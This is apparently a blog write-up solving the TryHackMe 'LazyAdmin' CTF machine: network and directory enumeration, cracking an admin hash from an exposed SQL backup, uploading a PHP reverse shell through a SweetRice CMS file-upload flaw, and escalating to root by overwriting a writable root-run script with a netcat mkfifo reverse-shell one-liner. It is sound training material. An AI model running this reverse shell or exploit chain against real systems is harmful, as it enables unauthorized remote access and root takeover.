Series of CTF machines walkthrough #2 “LazyAdmin TryHackMe”.
Hello Everyone, today Im back with amazing CTF machine called “LazyAdmin” from TryHackMe.
Let’s start,
As usual every thing starts from scanning the network using the Nmap.
nmap -sC -sV -sS -p- 10.10.218.225
You can see the above image 2 ports are open “port 80 and 22”.
Lets copy the IP address and paste it in browser, you can see the default ubuntu page.
Found nothing interesting in source page, robots.txt and sitemaps.xml.
Now we will enumerate the hidden directories using “ffuf”.
ffuf -w common.txt -u http://10.10.254.204/FUZZ
You can see the above hidden directories. there are only 2 useful directories “index.html and “content”.
Found nothing on /index.html, but when you open the /content directory, you can see the Welcome page which says “Welcome to SweetRice” but this page is saying “the site is building now”.
You can see this site is using SweetRice CMS so its worth of checking for the login pannel and source page.
Found /js directory and some javascript files in source page, but got nothing in those files.
So it’s time enumerate the more hidden directories form /content directory. lets enumerate the /content directory using ffuf.
We found 5 directories as /js, /inc, /as, /attachment and /_themes.
Found nothing useful in /js directory, /attachment and /_themes.
In /inc directory you can see .php files and some directories, in that /mysql_backup seems interesting lets open the directory.
You can see the .sql file, download the file and open it from your favorite editor.
You can see the .sql file consist of “Username and Password”, the admin is “manager” which is the username and password is encrypted by “md5 hash algorithm” to crack it you can use domain tools. (Just Google It).
We got username and password, what about login page, still there is a one more directory to look. so open the /as directory you will get login page.
After login you can see this website looks similar like wordpress all the plugins and etc.
We got the “version number” so check out for the known vulnerabilities by using “searchsploit” or “Google”. open the terminal and search “searchsploit SweetRice 1.5.1”.
We got 5 results in that 3 files are not useful, by seeing “Arbitary file upload and PHP Code Execution” we can Upload the RCE file and get the reverse shell.to get the RCE file, visit the PentestMonkey webiste.
Copy the whole page and make changes like “IP = yourVPN IP and Port = as your wish”, after making the changes submit the “php-reverse-shell”.
Now open the terminal and start the listening port using “netcat”.
To get a reverse shell we have to execute the file, as we saw before /inc directory consists of configuration files and directories, so got to /inc directory and open the /ads directory and click the RCE.php file. you will get the reverse shell in your terminal.
To get a interactive shell use the python cmd above. we got a “User flag” congragulation, it’s time to get a “Root flag” so we have to elevate the privileges from user to root.
Privilege Escalation
When you list all user directories, you can see the /backup.pl file which is running as a root user.
Now open the /backup.pl file and you can see it is executing the “/copy.sh” script, let’s open the script.
The /copy.sh script contains the command of reverse shell, by just modifying the “IP Address” we can get a reverse shell of a root user.
If you check the permissions for /copy.sh script we have the permission to write the script so lets modify the script by using “echo” cmd and get root privileges.
By using this cmd you can modify the script “ echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.8 5554 >/tmp/f” >/etc/copy.sh”. and by using sudo you can run the /backup.pl script.
Before running the script, open the listener port by using “netcat”.
So finally we elevated our privileges and got a root flag .
Successfully we solved the “LazyAdmin” machine from the “TryHackMe” and ill be back with new CTF write-ups so make sure to follow in “Linked-in & Twitter”.
